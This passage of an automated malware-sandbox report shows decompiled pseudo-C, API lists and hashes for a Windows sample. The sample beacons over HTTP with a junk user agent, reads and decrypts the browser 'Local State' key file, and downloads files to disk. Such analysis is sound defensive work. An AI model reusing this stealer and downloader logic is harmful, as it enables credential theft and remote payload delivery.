						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
							_t182 = _t180 + _t193 * 2 + 2;
							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
							_v16 = _t78;
							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
								_t184 = _t182 + _t197 * 2 + 2;
								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
								_push( *0x40e228);
								_v20 = _t85;
								_push(_t184);
								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
									_t92 = LocalAlloc(0x40, 0x4000); // executed
									_t199 = _t92;
									_v28 = _t199;
									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
									_push(0);
									_t144 = _t94;
									_push(0x1a);
									_push(_t144);
									_push(0);
									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
										_push(_v12);
										_push(_t144);
										_push(_t144);
										if( *((intOrPtr*)( *0x40e000))() != 0) {
											_v40 = 1;
											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24); // executed
											if(_v24 > 0) {
												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
												_t173 = 0x10;
												_t112 = E0040A05F(_t109, _t173);
												_t202 = _t112;
												_v48 = _t202;
												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
												_v52 = _v52 & 0x00000000;
												_v36 = _t115;
												_t116 =  *0x40e204; // 0x4e5e00
												_v56 = _t116;
												_t117 = E00408619( &_v36);
												_v32 = _t117;
												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
												if(_t165 == 0) {
													_t199 = _v28;
												} else {
													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
													_t199 = _v28;
													if(_t127 != 0) {
														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
													}
												}
												LocalFree(_t187);
												LocalFree(_v32);
												LocalFree(_v36);
												LocalFree(_v48);
											}
										}
									}
									LocalFree(_v8);
									LocalFree(_v12);
									LocalFree(_v16);
									LocalFree(_v20);
									LocalFree(_t144);
									LocalFree(_t199);
									_t103 = _v40;
									L23:
									return _t103;
								}
								LocalFree(_v8);
								LocalFree(_v12);
								LocalFree(_v16);
								LocalFree(_v20);
								_push(0xfffffffa);
								L13:
								_pop(_t103);
								goto L23;
							}
							LocalFree(_v8);
							LocalFree(_v12);
							LocalFree(_v16);
							_push(0xfffffffb);
							goto L13;
						}
						LocalFree(_v8);
						LocalFree(_v12);
						_push(0xfffffffc);
						goto L13;
					}
					LocalFree(_v8);
					_push(0xfffffffd);
					goto L13;
				} else {
					_t146 = _t62 - _t178;
					_t142 = _t146 >> 1;
					if(_t146 >= 0) {
						goto L5;
					}
					_t140 = 0xfffffffe;
					return _t140;
				}
			}

0x00409be4
0x00409bf0
0x00409bf2
0x00409bf5
0x00409bf9
0x00409bfb
0x00409bff
0x00000000
0x00409c01
0x00409c14
0x00409c18
0x00409c1c
0x00409c2e
0x00409c4a
0x00409c58
0x00409c78
0x00409c83
0x00409c8b
0x00409c9f
0x00409cae
0x00409cd7
0x00409ce2
0x00409cea
0x00409cfe
0x00409d0b
0x00409d3a
0x00409d45
0x00409d47
0x00409d4d
0x00409d55
0x00409d6c
0x00409da6
0x00409da8
0x00409db6
0x00409db9
0x00409dbb
0x00409dbd
0x00409dc4
0x00409dc6
0x00409dc7
0x00409dcd
0x00409dd3
0x00409ddb
0x00409ddc
0x00409de1
0x00409dea
0x00409e00
0x00409e0c
0x00409e1f
0x00409e2b
0x00409e2f
0x00409e34
0x00409e3f
0x00409e47
0x00409e50
0x00409e55
0x00409e5c
0x00409e5f
0x00409e64
0x00409e67
0x00409e71
0x00409e7f
0x00409e95
0x00409e99
0x00409ed6
0x00409e9b
0x00409eaf
0x00409eb1
0x00409eb6
0x00409ecc
0x00409ed1
0x00409eb6
0x00409eda
0x00409ee3
0x00409eec
0x00409ef5
0x00409ef5
0x00409e0c
0x00409de1
0x00409efe
0x00409f07
0x00409f10
0x00409f19
0x00409f20
0x00409f27
0x00409f2d
0x00409f30
0x00000000
0x00409f30
0x00409d71
0x00409d7a
0x00409d83
0x00409d8c
0x00409d92
0x00409d94
0x00409d94
0x00000000
0x00409d94
0x00409d10
0x00409d19
0x00409d22
0x00409d28
0x00000000
0x00409d28
0x00409cb3
0x00409cbc
0x00409cc2
0x00000000
0x00409cc2
0x00409c5d
0x00409c63
0x00000000
0x00409c1e
0x00409c20
0x00409c22
0x00409c24
0x00000000
0x00000000
0x00409c28
0x00000000
0x00409c28

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0eeb41d991fee10332494d35f948fcf2730c46131993d2be2dfeab9eb7d5c82
Instruction ID: 1477a699490ab6d120e37a0d83275f9d0d9eb78bf41bd20a7fb73821678a20ad
Opcode Fuzzy Hash: e0eeb41d991fee10332494d35f948fcf2730c46131993d2be2dfeab9eb7d5c82
Instruction Fuzzy Hash: FCA10572A00215BFEB00DBAADE45EAE7BB5EB48310F144935F614F32E1CB745D208B69

Uniqueness

Uniqueness Score: -1.00%

Function 00407C62 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 232
networkmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00407C62(short* __ecx, intOrPtr _a4, WCHAR* _a8, LPCWSTR* _a12) {
				signed int _v8;
				long _v12;
				long _v16;
				WCHAR* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _t49;
				void* _t53;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t66;
				int _t76;
				void* _t85;
				void* _t89;
				int _t94;
				int _t97;
				long _t98;
				void* _t101;
				void* _t102;
				signed int _t104;
				long _t107;
				void* _t109;
				void* _t115;
				void* _t118;
				WCHAR* _t120;
				void* _t121;
				void* _t124;
				short* _t125;
				signed short* _t126;
				void* _t127;
				void* _t128;
				int _t130;

				_v8 = _v8 & 0x00000000;
				_t125 = __ecx; // executed
				_t49 = LocalAlloc(0x40, 0xc350); // executed
				_t102 = _t49;
				_t120 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v32 = _t120;
				if( *_t125 != 0x68) {
					L24:
					return 0;
				}
				_t53 = 0x74;
				if( *((intOrPtr*)(_t125 + 2)) != _t53 ||  *((intOrPtr*)(_t125 + 4)) != _t53 ||  *((short*)(_t125 + 6)) != 0x70) {
					goto L24;
				} else {
					_v16 =  *(_t125 + 8) & 0x0000ffff;
					_t56 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e3ec);
					_v12 = 0x2f;
					_t115 = 0;
					_t10 = _t56 + 6; // 0x6
					_t126 = _t10;
					_t57 =  *_t126 & 0x0000ffff;
					_t104 = _t57;
					if(_t57 == _v12) {
						L7:
						_t59 =  *((intOrPtr*)( *0x40e08c))(_t120);
						_v20 =  &(_t126[_t59]);
						_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
						_t20 = _t127 + 0x40; // 0x40
						_t107 =  *((intOrPtr*)( *0x40e044))(0x40, _t20);
						_v12 = _t107;
						if(_t127 == 0) {
							L9:
							_t66 = InternetOpenW(L"mozzzzzzzzzzz", 0, 0, 0, 0); // executed
							_t128 = _t66;
							_v24 = _t128;
							if(_t128 == 0) {
								L20:
								_t109 = MultiByteToWideChar(0xfde9, 0, _t102,  *((intOrPtr*)( *0x40e198))(0) + 1, _t102, 0);
								_v28 = _t109;
								if(_t109 == 0) {
									_t130 = _v8;
								} else {
									_t121 = _t109 + _t109;
									_t76 =  *((intOrPtr*)( *0x40e044))(0x40, _t121);
									_v8 = _t76;
									MultiByteToWideChar(0xfde9, 0, _t102,  *((intOrPtr*)( *0x40e198))(_v28) + 1, _t102, _t76);
									_t130 = _v8;
									 *((short*)(_t121 + _t130 - 2)) = 0;
								}
								LocalFree(_v12);
								LocalFree(_v32);
								LocalFree(_t102); // executed
								return _t130;
							}
							_push(1);
							_push(0);
							_t83 =  ==  ? 0x1bb : 0;
							_t84 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
							_t85 = InternetConnectW(_t128, _t120, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3); // executed
							_t118 = _t85;
							_v28 = _t118;
							if(_t118 == 0) {
								L19:
								InternetCloseHandle(_t128);
								goto L20;
							}
							_push(1);
							_t88 =  ==  ? 0xc00000 : 0x400000;
							_t89 = HttpOpenRequestW(_t118,  *0x40e25c, _v20, 0, 0, _a12,  ==  ? 0xc00000 : 0x400000, 0x73); // executed
							_t124 = _t89;
							if(_t124 == 0) {
								L18:
								InternetCloseHandle(_v28);
								goto L19;
							}
							_t94 = HttpSendRequestW(_t124, _a8,  *((intOrPtr*)( *0x40e08c))( *((intOrPtr*)( *0x40e198))(_v12)), _a8, _v12); // executed
							if(_t94 == 0) {
								L17:
								InternetCloseHandle(_t124); // executed
								_t128 = _v24;
								goto L18;
							}
							while(1) {
								_t97 = InternetReadFile(_t124, _t102, 0xc350,  &_v16); // executed
								if(_t97 == 0) {
									goto L17;
								}
								_t98 = _v16;
								if(_t98 == 0) {
									goto L17;
								}
								 *((char*)(_t98 + _t102)) = 0;
							}
							goto L17;
						}
						_push(0);
						_push(0);
						_push(_t127);
						_push(_t107);
						_push(0xffffffff);
						_push(_a4);
						_push(0);
						_push(0xfde9);
						if( *((intOrPtr*)( *0x40e0e4))() == 0) {
							goto L24;
						}
						goto L9;
					}
					_t101 = 0;
					do {
						_t115 = _t115 + 1;
						 *(_t101 + _t120) = _t104;
						_t101 = _t115 + _t115;
						_t104 =  *(_t101 + _t126) & 0x0000ffff;
					} while (_t104 != _v12);
					goto L7;
				}
			}

0x00407c6d
0x00407c7b
0x00407c7d
0x00407c84
0x00407c93
0x00407c95
0x00407c98
0x00407ed4
0x00000000
0x00407ed4
0x00407ca0
0x00407ca5
0x00000000
0x00407cc0
0x00407cca
0x00407cd3
0x00407cd5
0x00407cdc
0x00407cde
0x00407cde
0x00407ce1
0x00407ce4
0x00407cea
0x00407d00
0x00407d06
0x00407d17
0x00407d2c
0x00407d2e
0x00407d36
0x00407d38
0x00407d3d
0x00407d5f
0x00407d6f
0x00407d71
0x00407d73
0x00407d78
0x00407e52
0x00407e70
0x00407e72
0x00407e77
0x00407eb4
0x00407e79
0x00407e7e
0x00407e84
0x00407e97
0x00407ea6
0x00407ea8
0x00407ead
0x00407ead
0x00407eba
0x00407ec3
0x00407eca
0x00000000
0x00407ed0
0x00407d7e
0x00407d88
0x00407d9c
0x00407d9f
0x00407da5
0x00407da7
0x00407da9
0x00407dae
0x00407e4b
0x00407e4c
0x00000000
0x00407e4c
0x00407db4
0x00407dcd
0x00407de2
0x00407de4
0x00407de8
0x00407e42
0x00407e45
0x00000000
0x00407e45
0x00407e0e
0x00407e12
0x00407e38
0x00407e39
0x00407e3f
0x00000000
0x00407e3f
0x00407e26
0x00407e32
0x00407e36
0x00000000
0x00000000
0x00407e1b
0x00407e20
0x00000000
0x00000000
0x00407e22
0x00407e22
0x00000000
0x00407e26
0x00407d46
0x00407d47
0x00407d48
0x00407d49
0x00407d4a
0x00407d4c
0x00407d4f
0x00407d50
0x00407d59
0x00000000
0x00000000
0x00000000
0x00407d59
0x00407cec
0x00407cee
0x00407cee
0x00407cef
0x00407cf3
0x00407cf6
0x00407cfa
0x00000000
0x00407cee

APIs

LocalAlloc.KERNEL32(00000040,0000C350,00000000,00000000,00000000,?,?,?), ref: 00407C7D
InternetOpenW.WININET(mozzzzzzzzzzz,00000000,00000000,00000000,00000000), ref: 00407D6F
InternetConnectW.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000001), ref: 00407DA5
HttpOpenRequestW.WININET(00000000,?,00000000,00000000,?,00400000,00000001), ref: 00407DE2
HttpSendRequestW.WININET(00000000,?,00000000), ref: 00407E0E
InternetReadFile.WININET(00000000,00000000,0000C350,?), ref: 00407E32
InternetCloseHandle.WININET(00000000), ref: 00407E39
InternetCloseHandle.WININET(?), ref: 00407E45
InternetCloseHandle.WININET(00000000), ref: 00407E4C
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407E6E
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407EA6
LocalFree.KERNEL32(0000002F), ref: 00407EBA
LocalFree.KERNEL32(?), ref: 00407EC3
LocalFree.KERNELBASE(00000000), ref: 00407ECA

Strings

mozzzzzzzzzzz, xrefs: 00407D6A
/, xrefs: 00407CD5

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Internet$Local$CloseFreeHandle$ByteCharHttpMultiOpenRequestWide$AllocConnectFileReadSend
String ID: /$mozzzzzzzzzzz
API String ID: 1268748717-9660103
Opcode ID: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction ID: 677f3e060cdc4141eea8ad2591dda170fc442a0e6149e7f0a8c7285b1f3b2b30
Opcode Fuzzy Hash: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
Instruction Fuzzy Hash: 0F71BF71A00215BFEB149BA5CD45F7B77B8EB48700F04847AFA14FB2D0D6B4AD508BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401C87 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 151
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401C87(WCHAR* __ecx, void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, void* _a16) {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _t35;
				void* _t42;
				int _t50;
				void* _t56;
				void* _t66;
				struct _OVERLAPPED* _t73;
				void* _t74;
				void* _t77;
				void* _t78;
				long _t81;
				void* _t93;
				void* _t96;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				intOrPtr* _t103;

				_v12 = __edx;
				_t73 = 0;
				_v8 = __ecx;
				_v20 = 0;
				_t35 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_t96 = _t35;
				_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				if(_a16 != 0) {
					_push(__ecx);
				} else {
					PathCombineW(_t96, __ecx, _v12);
					_push(_t96);
				}
				_t98 = _a4;
				 *_t98 =  *((intOrPtr*)( *0x40e13c))( *_t98);
				_t99 = _v16;
				PathCombineW(_t99, _v8, L"Local State");
				_t42 = CreateFileW(_t99, 0x80000000, 1, _t73, 3, _t73, _t73); // executed
				_t77 = _t42;
				_v12 = _t77;
				_t78 =  *((intOrPtr*)( *0x40e14c))(_t77, _t73);
				_a16 = _t78;
				_t93 =  *((intOrPtr*)( *0x40e044))(0x40, _t78);
				_v8 = _t93;
				_t50 = ReadFile(_v12, _t93, _a16 - 1,  &_v20, _t73); // executed
				if(_t50 != 0) {
					_t81 = _a16 + _a16;
					_v24 = _t81;
					_t56 = LocalAlloc(0x40, _t81); // executed
					_t100 =  *0x40e1f4; // 0x5002d0
					_a16 = _t56;
					E0040A16F(E0040A4C2(_v8), _t100,  &_a16,  &_a16); // executed
					_push(_a16);
					if( *((intOrPtr*)( *0x40e08c))() > 0) {
						_t101 = _a8;
						 *_t101 =  *((intOrPtr*)( *0x40e13c))( *_t101, _a16); // executed
						LocalFree(_a16); // executed
						_t66 = LocalAlloc(0x40, _v24); // executed
						_t102 =  *0x40e200; // 0x4fecb8
						_a16 = _t66;
						E0040A16F(E0040A4C2(_v8), _t102,  &_a16,  &_a16); // executed
						_t74 = _a16;
						if(_t74 != 0) {
							_t103 = _a12;
							 *_t103 =  *((intOrPtr*)( *0x40e13c))( *_t103, _t74); // executed
							LocalFree(_t74); // executed
						}
						_t73 = 1;
					}
					FindCloseChangeNotification(_v12); // executed
					_t99 = _v16;
				}
				LocalFree(_t99); // executed
				LocalFree(_t96);
				LocalFree(_v8); // executed
				return _t73;
			}

0x00401c9c
0x00401c9f
0x00401ca1
0x00401ca6
0x00401ca9
0x00401cb0
0x00401cbb
0x00401cc1
0x00401cd1
0x00401cc3
0x00401cc8
0x00401cce
0x00401cce
0x00401cd2
0x00401ce6
0x00401ce8
0x00401cec
0x00401d04
0x00401d06
0x00401d0f
0x00401d14
0x00401d1e
0x00401d29
0x00401d2f
0x00401d3c
0x00401d40
0x00401d4e
0x00401d53
0x00401d56
0x00401d5b
0x00401d61
0x00401d72
0x00401d7e
0x00401d85
0x00401d87
0x00401d99
0x00401d9b
0x00401dab
0x00401db0
0x00401db6
0x00401dc7
0x00401dcc
0x00401dd3
0x00401dd5
0x00401de3
0x00401de5
0x00401de5
0x00401ded
0x00401ded
0x00401df1
0x00401df7
0x00401df7
0x00401dfb
0x00401e02
0x00401e0b
0x00401e17

APIs

PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401CC8
PathCombineW.SHLWAPI(?,?,Local State), ref: 00401CEC
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401D04
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00401D3C
LocalAlloc.KERNEL32(00000040,?), ref: 00401D56
LocalFree.KERNELBASE(?), ref: 00401D9B
LocalAlloc.KERNEL32(00000040,?), ref: 00401DAB
LocalFree.KERNELBASE(?), ref: 00401DE5
FindCloseChangeNotification.KERNEL32(?), ref: 00401DF1
LocalFree.KERNEL32(?), ref: 00401DFB
LocalFree.KERNEL32(00000000), ref: 00401E02
LocalFree.KERNELBASE(?), ref: 00401E0B

Strings

Local State, xrefs: 00401CDE

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$AllocCombineFilePath$ChangeCloseCreateFindNotificationRead
String ID: Local State
API String ID: 4164476917-22827320
Opcode ID: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction ID: e8ea5197d75d1b9ffa148ce1658a92dc358bcbabd267189588b6ee53365c4b7a
Opcode Fuzzy Hash: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
Instruction Fuzzy Hash: B95141B5600215EFEB04DFA5DE85AAE7BB9EF48300F104829F915F7250D774AD20CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 22.6, APIs: 15, Instructions: 114COMMON

Download Yara Rule

APIs

_check_managed_app.LIBCMTD ref: 004134AC
__heap_init.LIBCMTD ref: 004134B6

Part of subcall function 00422620: HeapCreate.KERNEL32(00000000,00001000,00000000,?,004134BB,00000001), ref: 00422636

_fast_error_exit.LIBCMTD ref: 004134C4

Part of subcall function 00413610: ___crtExitProcess.LIBCMTD ref: 00413634

__mtinit.LIBCMTD ref: 004134CC
_fast_error_exit.LIBCMTD ref: 004134D7
__RTC_Initialize.LIBCMTD ref: 004134E9
__amsg_exit.LIBCMTD ref: 00413500
___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
___setargv.LIBCMTD ref: 0041351D
__amsg_exit.LIBCMTD ref: 00413528
__setenvp.LIBCMTD ref: 00413530
__amsg_exit.LIBCMTD ref: 0041353B
__cinit.LIBCMTD ref: 00413545
__amsg_exit.LIBCMTD ref: 0041355A
__wincmdln.LIBCMTD ref: 00413562

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
String ID:
API String ID: 1259877414-0
Opcode ID: 00a0afeaad1b4fafdd9e5251d42d89f04396b4629597290ad4fc375a040151d5
Instruction ID: 0f1e660c31b9fec308a46fc5c459b10c93befc3b333bb24cdea645fe2f35eac8
Opcode Fuzzy Hash: 00a0afeaad1b4fafdd9e5251d42d89f04396b4629597290ad4fc375a040151d5
Instruction Fuzzy Hash: 4941C8B1D00318BBDB10AFA2DD067DEB6B5AB14718F10412EF41597282E77D96808B9A

Uniqueness

Uniqueness Score: -1.00%

Function 004134A5 Relevance: 22.6, APIs: 15, Instructions: 88COMMON

Download Yara Rule

APIs

_check_managed_app.LIBCMTD ref: 004134AC
__heap_init.LIBCMTD ref: 004134B6

Part of subcall function 00422620: HeapCreate.KERNEL32(00000000,00001000,00000000,?,004134BB,00000001), ref: 00422636

_fast_error_exit.LIBCMTD ref: 004134C4

Part of subcall function 00413610: ___crtExitProcess.LIBCMTD ref: 00413634

__mtinit.LIBCMTD ref: 004134CC
_fast_error_exit.LIBCMTD ref: 004134D7
__RTC_Initialize.LIBCMTD ref: 004134E9
__amsg_exit.LIBCMTD ref: 00413500
___crtGetEnvironmentStringsA.LIBCMTD ref: 00413513
___setargv.LIBCMTD ref: 0041351D
__amsg_exit.LIBCMTD ref: 00413528
__setenvp.LIBCMTD ref: 00413530
__amsg_exit.LIBCMTD ref: 0041353B
__cinit.LIBCMTD ref: 00413545
__amsg_exit.LIBCMTD ref: 0041355A
__wincmdln.LIBCMTD ref: 00413562

Memory Dump Source

Source File: 00000014.00000002.440482009.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_412000_F0geI.jbxd

Similarity

API ID: __amsg_exit$___crt_fast_error_exit$CreateEnvironmentExitHeapInitializeProcessStrings___setargv__cinit__heap_init__mtinit__setenvp__wincmdln_check_managed_app
String ID:
API String ID: 1259877414-0
Opcode ID: 1ae0cede8a6f80fa2b0e897c4d02645d5987a066f0932666652f4bbf2efc4084
Instruction ID: d791b14cbc55d7fd5126e6317dd736716c75130935513ae69eaa218fc0ddf6fe
Opcode Fuzzy Hash: 1ae0cede8a6f80fa2b0e897c4d02645d5987a066f0932666652f4bbf2efc4084
Instruction Fuzzy Hash: 6231B5F1E00314BAEB10AFB2A9027DE7660AB1070DF10412FE91957282F67996818A5B

Uniqueness

Uniqueness Score: -1.00%

Function 00408495 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 134
filenetworkstringCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00408495(WCHAR* __ecx, WCHAR* __edx, WCHAR* _a4) {
				long _v8;
				WCHAR* _v12;
				long _v16;
				void _v2064;
				void* _t32;
				void* _t35;
				signed int _t36;
				long _t39;
				void* _t42;
				void* _t44;
				int _t47;
				int _t53;
				void* _t55;
				void* _t56;
				signed int _t58;
				void* _t69;
				WCHAR* _t71;
				void* _t72;
				signed short* _t73;
				void* _t75;

				_v12 = __edx;
				_t71 = __ecx;
				_t56 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				if( *((short*)(__ecx)) != 0x68) {
					L15:
					LocalFree(_t56);
					return 0;
				}
				_t32 = 0x74;
				if( *((intOrPtr*)(__ecx + 2)) != _t32 ||  *((intOrPtr*)(__ecx + 4)) != _t32 ||  *((short*)(__ecx + 6)) != 0x70) {
					goto L15;
				} else {
					_v16 =  *(__ecx + 8) & 0x0000ffff;
					_t35 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e3ec);
					_t69 = 0;
					_v8 = 0x2f;
					_t8 = _t35 + 6; // 0x6
					_t73 = _t8;
					_t36 =  *_t73 & 0x0000ffff;
					_t58 = _t36;
					if(_t36 == _v8) {
						L7:
						lstrlenW(_t56);
						_t39 =  *((intOrPtr*)( *0x40e124))(L"qwrqrwrqwrqwr", 0, 0, 0, 0);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L15;
						}
						_t61 =  ==  ? 0x84c00000 : 0x84400000;
						_t42 = InternetOpenUrlW(_v8, _t71, _v12,  *((intOrPtr*)( *0x40e08c))(0), _v12,  ==  ? 0x84c00000 : 0x84400000); // executed
						_t72 = _t42;
						if(_t72 == 0) {
							goto L15;
						}
						_t44 = CreateFileW(_a4, 0x40000000, 0, 0, 2, 0x8000000, 0); // executed
						_t75 = _t44;
						if(_t75 == 0xffffffff) {
							goto L15;
						}
						_t47 = InternetReadFile(_t72,  &_v2064, 0x800,  &_v8); // executed
						while(_t47 != 0) {
							if(_v8 == 0) {
								FindCloseChangeNotification(_t75); // executed
								LocalFree(_t56);
								return 1;
							}
							_t53 = WriteFile(_t75,  &_v2064, _v8,  &_v16, 0); // executed
							if(_t53 == 0) {
								goto L15;
							}
							_t47 = InternetReadFile(_t72,  &_v2064, 0x800,  &_v8); // executed
						}
						goto L15;
					}
					_t55 = 0;
					do {
						_t69 = _t69 + 1;
						 *(_t55 + _t56) = _t58;
						_t55 = _t69 + _t69;
						_t58 =  *(_t55 + _t73) & 0x0000ffff;
					} while (_t58 != _v8);
					goto L7;
				}
			}

0x004084ad
0x004084b0
0x004084b8
0x004084ba
0x004085f8
0x004085f9
0x00000000
0x004085ff
0x004084c2
0x004084c7
0x00000000
0x004084e2
0x004084ec
0x004084f5
0x004084f7
0x004084f9
0x00408500
0x00408500
0x00408503
0x00408506
0x0040850c
0x00408522
0x00408523
0x00408539
0x0040853b
0x00408540
0x00000000
0x00000000
0x00408561
0x00408574
0x00408576
0x0040857a
0x00000000
0x00000000
0x00408596
0x00408598
0x0040859d
0x00000000
0x00000000
0x004085b6
0x004085f4
0x004085be
0x00408607
0x0040860e
0x00000000
0x00408616
0x004085d6
0x004085da
0x00000000
0x00000000
0x004085f2
0x004085f2
0x00000000
0x004085f4
0x0040850e
0x00408510
0x00408510
0x00408511
0x00408515
0x00408518
0x0040851c
0x00000000
0x00408510

APIs

lstrlenW.KERNEL32(00000000), ref: 00408523
InternetOpenUrlW.WININET(0000002F,?,00408819,00000000), ref: 00408574
CreateFileW.KERNEL32(00408819,40000000,00000000,00000000,00000002,08000000,00000000), ref: 00408596
InternetReadFile.WININET(00000000,?,00000800,0000002F), ref: 004085B6
WriteFile.KERNEL32(00000000,?,00000000,00000073,00000000), ref: 004085D6
InternetReadFile.WININET(00000000,?,00000800,00000000), ref: 004085F2
LocalFree.KERNEL32(00000000), ref: 004085F9
FindCloseChangeNotification.KERNEL32(00000000), ref: 00408607
LocalFree.KERNEL32(00000000), ref: 0040860E

Strings

qwrqrwrqwrqwr, xrefs: 00408534
y@, xrefs: 00408495

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: File$Internet$FreeLocalRead$ChangeCloseCreateFindNotificationOpenWritelstrlen
String ID: qwrqrwrqwrqwr$y@
API String ID: 1040460322-4056631227
Opcode ID: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction ID: 1aaf66e6ff826a0af1a1f58395baf02585259993efb391a5facff1777f096ed2
Opcode Fuzzy Hash: 2efbc42d44f6ec5ca4160c273d464a785a5d876e109b975a63a0bab6d59c1f12
Instruction Fuzzy Hash: 4241BE70900115BEEB149BA5CE49EBAB3B8EB44300F00853AE551B72D1EBB4AE54DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00409906 Relevance: 17.8, APIs: 14, Instructions: 263
COMMON

Download Yara Rule

C-Code - Quality: 23%

			E00409906(void* _a4, short* _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				signed int _v28;
				char _v32;
				void* _v36;
				char _v60;
				signed int _t53;
				signed int _t55;
				signed int _t60;
				void* _t64;
				signed int _t67;
				void* _t71;
				void* _t78;
				void* _t100;
				signed int _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t126;
				signed int _t127;
				signed int _t133;
				void* _t144;
				char _t149;
				void* _t158;
				void* _t162;
				signed int _t163;
				void* _t164;
				void* _t166;
				void* _t168;
				void* _t173;
				void* _t174;
				signed int _t179;
				void* _t184;

				_t127 = 0;
				_t53 =  *((intOrPtr*)( *0x40e18c))(_a4,  *0x40e430, _t162, _t126);
				_t163 = _t53;
